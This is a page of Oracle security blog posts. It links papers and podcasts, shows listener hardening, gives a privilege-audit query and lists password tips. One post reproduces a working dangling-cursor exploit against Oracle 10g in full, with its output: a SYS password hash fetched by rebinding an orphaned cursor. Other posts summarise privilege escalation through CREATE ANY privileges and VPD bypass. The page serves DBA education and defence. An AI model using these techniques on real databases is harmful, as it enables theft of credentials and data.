News, views, tips and tricks on Oracle and other fun stuff

New Oracle Security Videos and Blog

Alexander Kornbrust of Red-Database-Security has started a new Oracle security blog (just added to OraNa.info). He also posted new Oracle security videos, 10 as of today.

Filed in Oracle, Security with Comments Off | Tags:


5 Recent Oracle Security Related Documents

  1. Oracle Applications 11i Encrypted Password String Disclosure (PDF): An undisclosed security vulnerability exists in Oracle Applications 11i that may allow an unauthenticated, internal attacker to obtain Oracle Applications’ user account encrypted password strings, which in turn can be decrypted using previously published information. An attacker can potentially obtain either any user’s password or the Oracle Applications’ main database account password (APPS).

  2. Building an Audit Trail in an Oracle Applications Environment (PDF): Sarbanes-Oxley’s section 404 requires a company’s key systems be audited. However, many companies have “unauditable” systems and don’t even know it. This paper explores methods by which companies can create an auditable system by implementing various levels of audit trails in Oracle Applications.

  3. Dissecting the Redo Logs (PDF): This paper delves into the guts of the undocumented binary format of the redo logs and shows the forensics examiner, if there is evidence to be found, how to find it and how it can be integrated into a time line of events. It also explores how an attacker can attempt to cover their tracks and how to spot this.

  4. Locating dropped objects (PDF): This paper shows that even when an object has been dropped and purged from the system there will, in the vast majority of cases, be fragments left “lying around” which can be sewn together to build an accurate picture of the actions the attacker took. Depending upon how quickly an investigation follows the incident in question, even all of the data pertaining to the dropped object or objects may still be found.

  5. Isolating Evidence of Attacks Against the Authentication Mechanism (PDF): This paper looks at attacks against the authentication mechanism and evidence to check whether a logon attempt was successful or not. It also looks at other attacks leveled at the authentication process including SID guessing, user enumeration and brute forcing of passwords over the network. Moreover, the paper looks at the differences between a logon attempt via the FTP and Web services provided with the XML Database and directly with the RDBMS itself.

Filed in Oracle, Security with 1 Comment | Tags: , ,


Oracle Database Listener Security Guide

Integrigy has just published an updated version of its white paper on Oracle Database Listener security.

From the introduction:

The Oracle Database Listener is the database server software component that manages the network traffic between the Oracle Database and the client. The Oracle Database Listener listens on a specific network port (default 1521) and forwards network connections to the Database. The Listener is comprised of two binaries: (1) tnslsnr which is the Listener itself and (2) the Listener Control Utility (lsnrctl) which is used to administer the Listener on the server or remotely.

Through our security assessments, Integrigy has consistently identified poor Oracle Database Listener security as a significant security risk. The majority of Oracle Database Listeners are not properly secured as recommended by Oracle and security experts. Fortunately in Oracle 10g, the default Listener configuration is much more secure.

The information contained in this paper is not new, nor is it obscure. It may not be well known to many Oracle DBAs, but it is well known to security experts and hackers. This paper will outline the vulnerabilities in the Oracle Database Listener and provide recommendations for properly securing it. Providing minimal security for the Oracle Database Listener is simple and should be done for all Oracle installations – development, test and production.

Here is a link to the full document.
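To make the “minimal security” the paper refers to concrete, here is a listener.ora fragment I have added to this post. It is not taken from the Integrigy paper; the hardening settings are my own summary of the standard advice for 9i/10g listeners, not a quote of the paper's recommendations. The listener name LISTENER, the host name, the ORACLE_HOME and the log paths are placeholders. The first part shows the shape of a typical out-of-the-box listener, the second the hardened one.

```ini
# ---- listener.ora: typical out-of-the-box shape (pre-10g) ----
# Anyone who can reach TCP/1521 can administer this listener remotely with
# lsnrctl: no password, no admin restrictions, no log, and the EXTPROC
# endpoint lets a database session load arbitrary shared libraries.
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost.example.com)(PORT = 1521))
      (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC))
    )
  )
SID_LIST_LISTENER =
  (SID_LIST =
    (SID_DESC = (SID_NAME = PLSExtProc)
                (ORACLE_HOME = /u01/app/oracle/product/10.2.0/db_1)
                (PROGRAM = extproc))
    (SID_DESC = (SID_NAME = ORCL)
                (ORACLE_HOME = /u01/app/oracle/product/10.2.0/db_1))
  )

# ---- listener.ora: hardened ----
# No IPC/EXTPROC endpoint and no PLSExtProc SID: drop external procedures
# unless you need them, and if you do, serve them from a separate listener
# running as a low-privilege OS user.
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost.example.com)(PORT = 1521))
    )
  )
SID_LIST_LISTENER =
  (SID_LIST =
    (SID_DESC = (SID_NAME = ORCL)
                (ORACLE_HOME = /u01/app/oracle/product/10.2.0/db_1))
  )
# Refuse every lsnrctl SET command, local or remote. Configuration changes
# now require editing this file and "lsnrctl reload".
ADMIN_RESTRICTIONS_LISTENER = ON
# Only the OS user that owns the listener process may administer it
# (the 10g default; stated explicitly so a later edit cannot silently flip it).
LOCAL_OS_AUTHENTICATION_LISTENER = ON
# Keep a log of connection and administration requests for forensics.
LOGGING_LISTENER = ON
LOG_DIRECTORY_LISTENER = /u01/app/oracle/network/log
LOG_FILE_LISTENER = listener.log
# Drop clients that do not finish the connect handshake within 10 seconds.
INBOUND_CONNECT_TIMEOUT_LISTENER = 10
# On 9i and earlier, also set a password: "lsnrctl change_password" followed
# by "lsnrctl save_config" writes a PASSWORDS_LISTENER entry into this file.
# Never type the password into this file in clear text.
```

After editing the file, run lsnrctl reload (or stop and start the listener) and confirm that lsnrctl status reports “Security ON: Local OS Authentication” and that the SET commands are refused.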

Filed in Oracle, Security with 2 Comments | Tags:


Indirect Privilege Escalation And Defeating Virtual Private Databases

David Litchfield has just published two chapters from his book The Oracle Hacker’s Handbook: Hacking and Defending Oracle.

Indirect Privilege Escalation (PDF)

In this chapter, David gives two examples, one with CREATE ANY TRIGGER and another with CREATE ANY VIEW, to demonstrate how these privileges can be abused to gain DBA privileges. The general mechanism is that a CREATE ANY x privilege lets a user create objects in somebody else's schema, including SYS's or SYSTEM's, and triggers, views and stored code run with their owner's privileges rather than the caller's; code planted that way becomes DBA code the moment it executes, and SQL injection into existing PL/SQL is typically what gets it executed. The practical rule is to treat every CREATE ANY x privilege as if it were DBA.

Defeating Virtual Private Databases (PDF)

Virtual Private Databases (VPDs) allow a user to access only the data that the policy specifies they can access, and no more. In this chapter, David demonstrates how to trick Oracle into dropping a policy and how to defeat VPDs with raw file access. Again, SQL injection is the main culprit.
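The check a DBA will want after reading those two chapters is “who in my database holds these privileges?”. The query below is an added example of my own, not code from the book or the chapters. It walks DBA_SYS_PRIVS and DBA_ROLE_PRIVS to list every account that can reach a CREATE ANY x privilege, directly or through any chain of roles, and also EXEMPT ACCESS POLICY, which bypasses VPD policies outright (that privilege is not discussed in the chapter; I include it because it is the blunt way to defeat VPD). Run it as a DBA; SYS, SYSTEM and holders of the DBA role will show up as expected, the interesting rows are the others.

```sql
-- Added example: accounts that can reach a CREATE ANY ... system privilege
-- (directly, or through a chain of roles), plus EXEMPT ACCESS POLICY.
-- Standard dictionary views only; needs SELECT on DBA_* (run as a DBA).
WITH edges AS (
  -- a system privilege held directly by a user or a role
  SELECT grantee, privilege, CAST(NULL AS VARCHAR2(30)) AS granted_role
  FROM   dba_sys_privs
  UNION ALL
  -- a role granted to a user or to another role
  SELECT grantee, CAST(NULL AS VARCHAR2(40)) AS privilege, granted_role
  FROM   dba_role_privs
)
SELECT DISTINCT
       CONNECT_BY_ROOT grantee                 AS account,   -- the user (or PUBLIC)
       privilege,
       LEVEL - 1                               AS role_hops, -- 0 = granted directly
       SYS_CONNECT_BY_PATH(grantee, ' -> ')    AS via        -- user -> role -> role ...
FROM   edges
WHERE  (privilege LIKE 'CREATE ANY %' OR privilege = 'EXEMPT ACCESS POLICY')
-- start from every real account, and from PUBLIC, whose grants apply to everyone
START WITH grantee = 'PUBLIC' OR grantee IN (SELECT username FROM dba_users)
-- follow a role grant down into the privileges and roles that role holds
CONNECT BY NOCYCLE PRIOR granted_role = grantee
ORDER BY account, privilege, role_hops;
```

Any row whose account is PUBLIC means every user in the database effectively holds that privilege; rows with role_hops greater than zero are the ones that a review of DBA_SYS_PRIVS alone would miss.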

Filed in Oracle, Tips with Comments Off | Tags: , ,


See How To Hack Oracle Using Dangling Cursor Snarfing

David Litchfield has published a paper showing how a cursor that a definer-rights procedure opens through DBMS_SQL and leaves open (a dangling cursor) when the procedure fails can be picked up by the caller and re-executed with the caller's own bind values, running the procedure owner's query without the procedure's checks.

I ran his proof of this vulnerability on my Oracle Database 10g Express Edition database.

Connected as SYS:

SQL> CREATE OR REPLACE PROCEDURE pwd_compare(p_user VARCHAR) IS
  2    cursor_name INTEGER;
  3    v_pwd VARCHAR2(30);
  4    i INTEGER;
  5  BEGIN
  6
  7    IF p_user != 'SYS' THEN
  8      cursor_name := dbms_sql.open_cursor;
  9      DBMS_OUTPUT.PUT_LINE('CURSOR: ' || cursor_name);
 10      dbms_sql.parse(cursor_name,
 11        'SELECT PASSWORD FROM SYS.DBA_USERS WHERE USERNAME = :u',
 12        dbms_sql.native);
 13      dbms_sql.bind_variable(cursor_name,   ':u',   p_user);
 14      dbms_sql.define_column(cursor_name,   1,   v_pwd,   30);
 15      i := dbms_sql.EXECUTE(cursor_name);
 16
 17      IF dbms_sql.fetch_rows(cursor_name) > 0 THEN
 18        dbms_sql.column_value(cursor_name,   1,   v_pwd);
 19      END IF;
 20
 21      IF v_pwd = '0123456789ABCDEF' THEN
 22        DBMS_OUTPUT.PUT_LINE('Hmmm....');
 23      END IF;
 24
 25      dbms_sql.close_cursor(cursor_name);
 26    END IF;
 27
 28  END;
 29  /

Procedure created.

SQL> GRANT EXECUTE ON pwd_compare TO PUBLIC;

Grant succeeded.

Note that the code above has no exception handling and closes the cursor only on the normal path. If anything fails between open_cursor and close_cursor, the procedure raises and returns with the cursor still open (dangling); because the procedure runs with definer's rights, that open cursor carries the statement SYS parsed, with SYS's privileges.

Now, let’s connect as HR, a less privileged user than SYS (EXECUTE was granted to PUBLIC, so HR can call the procedure), and run pwd_compare with an argument chosen to make it fail after the cursor has been opened: a 10,000-character string, far longer than any user name, which makes DBMS_SQL fail when the statement is executed:

SQL> DECLARE x VARCHAR(32000);
  2  i INTEGER;
  3  BEGIN
  4    FOR i IN 1 .. 10000
  5    LOOP
  6      x := 'B' || x;
  7    END LOOP;
  8
  9    sys.pwd_compare(x);
 10  END;
 11  /
CURSOR: 6
DECLARE x VARCHAR(32000);
*
ERROR at line 1:
ORA-01460: unimplemented or unreasonable conversion requested
ORA-06512: at "SYS.DBMS_SYS_SQL", line 1202
ORA-06512: at "SYS.DBMS_SQL", line 323
ORA-06512: at "SYS.PWD_COMPARE", line 15
ORA-06512: at line 9

What we have now is a dangling cursor with ID 6, still open in our session and still carrying the statement that SYS’s procedure parsed with SYS’s privileges. (The DBMS_OUTPUT line is a convenience: before 11g cursor numbers are small sequential integers and easy to guess.) Armed with that number we rebind :u to SYS, re-execute the query and fetch the SYS password hash, bypassing the p_user != 'SYS' check in pwd_compare:

SQL> DECLARE cursor_name INTEGER;
  2  i INTEGER;
  3  pwd VARCHAR2(30);
  4  BEGIN
  5    cursor_name := 6;
  6    dbms_sql.bind_variable(cursor_name,   ':u',   'SYS');
  7    dbms_sql.define_column(cursor_name,   1,   pwd,   30);
  8    i := dbms_sql.EXECUTE(cursor_name);
  9
 10    IF dbms_sql.fetch_rows(cursor_name) > 0 THEN
 11      dbms_sql.column_value(cursor_name,   1,   pwd);
 12    END IF;
 13
 14    dbms_sql.close_cursor(cursor_name);
 15    DBMS_OUTPUT.PUT_LINE('PWD: ' || pwd);
 16  END;
 17  /
PWD: 586EEA79959C07B1

PL/SQL procedure successfully completed.

Interesting!

Lessons learned:

  1. Validate input before it reaches DBMS_SQL. A user name longer than 30 characters can never match a row in DBA_USERS, so reject it up front; the over-long bind is what made the procedure fail at exactly the wrong moment here.
  2. Wrap DBMS_SQL code in an exception handler that closes the cursor (dbms_sql.is_open, then dbms_sql.close_cursor) on every error path before re-raising.
  3. Close cursors on every path, not only the successful one.
  4. Keep the root cause in view: a definer-rights procedure owned by SYS, granted to PUBLIC, whose cursor runs a query the caller could not run themselves. Grant such code to the accounts that need it rather than PUBLIC, and prefer AUTHID CURRENT_USER where the caller’s own privileges should apply. Oracle 11g later hardened DBMS_SQL against this attack (cursor numbers are no longer predictable, and reusing a cursor under a different effective user or roles raises ORA-29470), but the coding rules above still hold.
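Here is a hardened rewrite of pwd_compare that follows those rules. It is an added example, not code from this post or from David’s paper; the procedure name pwd_compare_safe is mine, and the query is deliberately kept identical so that the only difference is input validation and cursor hygiene.

```sql
CREATE OR REPLACE PROCEDURE pwd_compare_safe (p_user IN VARCHAR2)
  AUTHID DEFINER   -- explicit: runs as the owner (SYS), so cursor hygiene matters
IS
  c      INTEGER;
  v_pwd  VARCHAR2(30);
  n      INTEGER;
BEGIN
  -- 1. Validate before touching DBMS_SQL: a name this long can never match
  --    a row in DBA_USERS, and an over-long bind is what made the original
  --    fail after its cursor had been opened.
  IF p_user IS NULL OR LENGTH(p_user) > 30 THEN
    RAISE_APPLICATION_ERROR(-20001, 'invalid user name');
  END IF;
  IF p_user = 'SYS' THEN
    RETURN;   -- same policy as the original, decided before any cursor exists
  END IF;

  c := dbms_sql.open_cursor;
  BEGIN
    dbms_sql.parse(c, 'SELECT password FROM sys.dba_users WHERE username = :u',
                   dbms_sql.native);
    dbms_sql.bind_variable(c, ':u', p_user);
    dbms_sql.define_column(c, 1, v_pwd, 30);
    n := dbms_sql.execute(c);
    IF dbms_sql.fetch_rows(c) > 0 THEN
      dbms_sql.column_value(c, 1, v_pwd);
    END IF;
    IF v_pwd = '0123456789ABCDEF' THEN
      dbms_output.put_line('Hmmm....');
    END IF;
    -- 3. The normal path closes the cursor...
    dbms_sql.close_cursor(c);
  EXCEPTION
    WHEN OTHERS THEN
      -- 2. ...and so does every error path, before the error propagates,
      --    so the caller never inherits an open SYS cursor.
      IF dbms_sql.is_open(c) THEN
        dbms_sql.close_cursor(c);
      END IF;
      RAISE;
  END;
END pwd_compare_safe;
/
-- 4. Grant narrowly; the original's GRANT ... TO PUBLIC is the other half of the bug.
--    GRANT EXECUTE ON pwd_compare_safe TO some_specific_account;
```

Re-running HR’s 10,000-character call against this version fails at the length check, before any cursor is opened. If you force an error later in the block instead, the handler closes the cursor before the error reaches the caller, so the attacker’s second block has no open cursor to rebind and gets an invalid-cursor error.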

Filed in Oracle, Security, Tips with 1 Comment | Tags: , ,


A Couple of Podcasts About PL/SQL and Oracle Security

SearchOracle.com has just published a couple of interesting podcasts.

The first, titled Expert says PL/SQL change needed in Oracle 11g, is an interview with Steven Feuerstein.

In the interview, Steven answers the following questions:

  • Considering how big OpenWorld has become, should there be a separate conference for PL/SQL developers?
  • Your session at the conference was entitled “Ten things you should never do with PL/SQL.” What was number one?
  • What do you think is the biggest problem or challenge that PL/SQL developers need to address?
  • Users are very conditioned to accept bugs. Does this need to change?
  • Can you tell us about your new free tool for testing code?
  • What do you think are the biggest deficiencies in the PL/SQL language itself?
  • You’ve written ten very well regarded books. What’s next?

Listen to Steven’s answers

The second podcast, titled Security expert sizes up Oracle patch policies, is an interview with Aaron Newman, author of “Oracle Security Handbook” and co-founder and chief technology officer of Application Security Inc.

In the interview, Aaron answers the following questions:

  • Is Oracle OpenWorld getting too big to be useful?
  • Can you explain the methodology behind what you call post-attack analytics?
  • You argue that improper use of Oracle security products can erase the trail of an attacker. Could you elaborate on that?
  • What do you think about the overall state of Oracle security these days?
  • Is patching vulnerabilities a problem for Oracle?
  • How does Oracle stack up against Microsoft and IBM in the area of patching?
  • What does your firm offer in terms of security that Oracle does not?
  • Will Oracle’s Fusion initiative be good or bad for Oracle security?
  • What have you heard about the upcoming Oracle Database 11g?
  • What are some of the pet peeves you have with Oracle DBAs when it comes to security?

Listen to Aaron’s answers

Filed in Oracle, Security with 5 Comments | Tags: , ,


links for 2006-10-06

Filed in Links with 4 Comments | Tags: , ,


Screencasts: Cracking WEP, Tunneling Exploits and More

I stumbled upon this website which has the following interesting screencasts demonstrating the use of a penetration testing tool for Linux:

(IE may not display the screencasts correctly. Best viewed in Firefox)

It also has this interesting, and rather disturbing, animated GIF image:

click to see it in action

And finally, a web page that crashes your system, especially if you open it up in an outdated web browser:

_____ DO NOT CLICK HERE _____

If you are still curious about what that web page does, here is the HTML code (may still crash your system if using IE – open it at your own risk).

Here is what I think: in order to fully protect your system from all of these exploits and attacks, you have to learn all of these hacking techniques and tools. To outsmart “bad” hackers, you have to be a “good” hacker yourself.

Filed in Interesting Stuff, Technology with Comments Off | Tags: ,


Oracle Security Podcast With Pete Finnigan

I have just finished listening to a very interesting podcast interview with Pete Finnigan (via SearchOracle.com). Pete discusses the problems with Oracle PL/SQL wrapping and hopes that Oracle releases all the built-in PL/SQL packages unwrapped as clear text, as in open source, so that everyone can help with finding bugs. Pete also advises DBAs to think like hackers in order to improve the security of the database.

Listen to the podcast.

Filed in Oracle, Security with 1 Comment | Tags: ,


Top ten tips for better password management

There is an article on Silicon.com about how companies can manage their passwords. The author offers the following tips for fostering a culture of secure and more effective password management:

  1. Passwords must not be written down.
  2. Passwords must be set. When the password is “ChangeMe”, then change it.
  3. Require as few passwords as possible. Balance how much password protection you need with how many passwords can reasonably be managed.
  4. Staff must change their passwords regularly. This limits the likelihood of old passwords, shared between colleagues in less-secure times, coming back to haunt you.
  5. Make new passwords new. Old password = “Rowanda1”. New password = “Rowanda2”. Not good.
  6. Avoid obvious words. Passwords must be more complex than a single word which can be hacked with a dictionary attack.
  7. Think long – but not too long. A password which consists of at least eight characters with a mix of upper case, lower case and numbers is a good start.
  8. Automate password changes. The process of making staff reset and choose secure passwords must also be automated.
  9. Educate staff. Ensure password policy is written into employment contracts and that all staff understand why and what that entails.
  10. Look at long-term solutions which will eventually replace passwords – such as biometrics.

I believe that most of the above applies to individuals as well. In fact, tip number 10 is already a reality for the average consumer like you and me. Search Google for “biometric password manager” to see what I mean.

Personally, I have tens of passwords I need to keep track of. Since I avoid writing passwords down and it is impossible for me to remember them all, I rely primarily on my password manager software and sometimes on my memory when I am faced with “Please enter your user name and password”. Maybe I should try this new APC Biometric Password Manager, or something similar.

Filed in Security, Technology with 8 Comments | Tags: , ,